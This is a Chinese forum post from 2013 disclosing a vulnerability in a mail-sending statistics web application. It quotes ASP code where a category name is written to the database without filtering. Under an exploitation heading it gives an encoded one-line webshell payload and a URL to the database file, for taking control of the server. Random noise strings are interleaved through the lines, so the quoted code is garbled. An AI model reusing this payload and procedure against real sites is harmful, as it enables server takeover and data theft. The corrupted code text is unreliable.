找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2195|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp   a' u5 ?( s$ |4 _# H
6 k+ N5 O8 k3 U4 a; f# j
IF Request.QueryString("Action")="del" Then
! [; Z# M+ z; T2 ^: T" BID=Request.QueryString("ID") 7 c! `# l) q0 V; R1 ~- ]  _
IF Countss ("tui","Fenlei",ID )<>0 then 2 x" ?0 O$ k! q% l1 N0 I& L' C
'略 + z. s; T/ L/ T0 g
IF Request.QueryString("Action")="Add" Then , n  ^3 S( q7 }. N
Tname=Request.Form("Typename")
, f% A; R; O- `/ wSet Rs=Server.CreateObject("adodb.Recordset")
8 C7 A, O# D+ ~7 O/ B% {Sql="Select * From Fenlei Order by id Desc "
% ?7 Z  K: ~+ W6 K; nRs.Open Sql,Conn,1,3 + `5 C$ s2 y5 A5 t/ y% Q5 W
Rs.Addnew
" H5 o, o  E( LRs("Typename")=Tname , F1 V1 g7 ^$ Q5 Q
'略 ! w- m& Y: B: r4 g+ Y) y, n
Set Rs=Server.CreateObject("adodb.Recordset")
4 ^1 o* Y& e# w2 GSql="Select * From Fenlei Order by id Desc "
( n4 n: y6 ~" E3 k. ERs.Open Sql,Conn,1,1
: h$ G) d3 O$ S0 ^+ M'略 % b* m, K: G% y& `
%>7 Y( W3 n2 r. @0 a/ _5 \- J
+ `  A4 p5 {7 e
& N  v! m9 K/ Y

. J% X/ i, \' |4 O- M没有过滤,直接写入数据库。
# g$ z" M% \$ y( Z; X$ U
! V* F& r6 ~: K; ~: ]6 b. @8 V利用方法:* M: n7 b! {* B3 w

9 N0 c; R7 }. q$ J" q1 v插入:┼攠數畣整爠煥敵瑳∨≡┩>
6 ^+ S# K$ J/ i% q5 Q: Z
( q0 S& ^, X4 a$ |" p- ] / ?5 w# u0 _( {& I6 s
连接: http://www.xxx.com/###tongbaner.asa % u5 X3 Q% R: O
'默认安装文件:
/ c8 c% A7 _3 k$ Q" Z'install.asp9 A: ~4 Q% f6 a- Y0 f) b! v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表